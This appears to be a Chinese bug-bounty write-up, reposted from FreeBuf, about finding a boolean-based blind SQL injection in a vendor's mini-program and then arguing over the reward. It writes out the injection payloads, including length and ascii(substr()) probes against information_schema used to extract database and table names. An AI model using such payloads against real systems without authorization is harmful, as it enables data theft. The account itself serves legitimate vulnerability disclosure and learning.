src挖掘|与某src厂商斗智斗勇最终拿到赏金

前言

身为一个菜狗,当然想去src厂商哪里挖掘漏洞,获取赏金得到激励。于是乎,我去补天哪里随便找到一个厂商就开始了我的漏洞挖掘。(注:以下漏洞厂商已修复)

一、信息收集

通过爱企查,查找对方公司的域名,小程序,APP之类的,然后使用360quake,OneForAll,鹰图进行子域名查询等等,

时间太久了,很多图没有截上去,希望大佬勿喷

二、开始漏洞挖掘

在所有web网站进行挑选挖掘后,感觉实在挖不倒(太菜了,没有挖到),于是眼光开始转向新的方向,小程序渗透。至于如何抓包,这里不多讲,网上文章很多。

找找找中,看见一个很新鲜的小程序,于是打开进去,通过burp,看见post请求里面有id,于是测一波看有没有SQL注入

先进行注入判断, 'and 1=1#

回显正常

'and 1=2#

报错了,SQL注入来了啊

可以看出布尔盲注,于是接着构造攻击语句

判断数据库的长度

'and length(database())=8#

报错,在

'and length(database())=9#

正常回显,说明数据库名为9位数

获取数据库名,这里我们采用burp爆破模式

Payload:’and ascii(substr(database(),1,1))=§1§#

通过累加1获得数据库的ascii码值,在进行解码,获得数据库名

db_around

接着获取表名

'and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=§9§#

依次通过累加limit 的1获取到第一个表名

adb_task

后面就不跑了,交洞交洞,拿赏金去

三、挫折出现

漏洞提交后,静等审核

结果,居然打偏了,泪奔,太想哭了,亏自己兴奋一晚上,后面洞就放哪里不管了

然后转折出现,厂商发布收录域名,最后我一看,漏洞的域名属于收录范围啊,兴致冲冲在跑去交洞

又是兴奋的一晚上,结果

哭死,加气死,什么魔鬼啊,拒绝,难受死,理由却是

顶不住,就因为挖到洞,就连夜下资产吗,痛哭

最后转折,偷偷私聊审核,让审核帮我,最终在审核的帮助下,我拿到了赏金

虽然只有一百块,总比没有强,哭死。这个厂商记小本本,以后少碰

结语:这篇文章呢,想告诉大家我的漏洞挖掘思路,其次呢,就是一些厂商如果赏金不肯给的话,一定要想想办法,看能不能解决,不能就当吃哑巴亏吧,记在自己的小本本上,以后注意一点,最后,希望各位大佬天天爆大洞。

原文链接:https://www.freebuf.com/vuls/369423.html